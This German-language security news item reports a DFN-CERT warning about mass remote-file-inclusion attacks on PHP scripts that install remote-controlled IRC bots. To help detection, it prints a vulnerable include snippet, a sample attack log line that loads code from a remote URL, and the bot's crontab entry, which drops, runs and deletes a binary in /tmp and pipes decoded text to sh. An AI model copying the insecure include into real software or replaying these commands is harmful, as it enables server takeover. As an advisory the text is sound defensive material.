DFN-CERT warnt vor Angriffen auf Webserver mit unsicheren PHP-Skripten
Das DFN-CERT registriert nach eigenen Angaben zurzeit massive Angriffe auf Webserver mit unsicheren PHP-Skripten, um IRC-Bots zu installieren.
Das DFN-CERT und weitere deutsche CERTs (Computer Emergency Response Teams) registrieren nach eigenen Angaben zurzeit massive Angriffe auf Webserver mit unsicheren PHP-Skripten. In diese Skripte lässt sich weiterer Skript-Code einschleusen, der beispielsweise von einem anderem Webserver nachgeladen und ausgeführt wird. Laut Meldung finden sich auf bereits kompromittierten Systemen IRC-Bots, über die der Rechner fernsteuerbar ist und für weitere Angriffe missbraucht werden kann.
Betroffen sind Systeme, bei denen in der php.ini die Option allow_url_fopen = on gesetzt ist und sich ein Skript aufrufen lässt, das dynamisch Code nachlädt, beispielsweise so:
if (!isset($realm))
{
include "home.template";
}
else
{
include $realm ;
}
Anstelle des Pfades zu einer lokalen Datei ist es so möglich, eine URL zu einer Datei auf einem Webserver anzugeben. Der include-Befehl lädt das Skript von dort aus nach und bindet ihn ein. Liegt der Exploit-Code bereit und ist ein verwundbares Skript gefunden, kann ein Angreifer über einen einzigen HTTP-Get-Request die Attacke starten.
Das DFN-CERT rät, derart konfigurierte Systeme nach Einbruchsspuren zu untersuchen. Sollte in den Logdateien des eigenen Webservers Einträge wie
[28/Sep/2004:18:03:07 +0200] "GET
/pfad/zu/einem/script.php?
variablenname=http://192.168.1.2:4213/
HTTP/1.0" 200 15183 "-" "Wget/1.8.1"
oder ähnliche vorhanden sein, ist das System eventuell bereits kompromittiert. Der IRC-Bot soll sich anhand eines Eintrages in der Crontab erkennen lassen:
# "\177\105\114\10 [...] \000\37777777777" >
/tmp/tblihjauk ; chmod \700 /tmp/tblihjauk ;
/tmp/tblihjauk x ; rm -f /tmp/tblihjauk34
* * * * /bin/echo `crontab -l|grep '.\{666\}'
|sed 's/^./echo -e -n/'`|sh
Nach ersten Erkenntnissen wurden bislang nur Linux-Systeme kompromittiert, allerdings ist die Lücke prinzipiell auch unter anderen Betriebssystemen ausnutzbar.
Siehe dazu auch: (dab)
- Warnung vom DFN-CERT
- Hardened PHP -- Sicheres PHP Projekt von Stefan Esser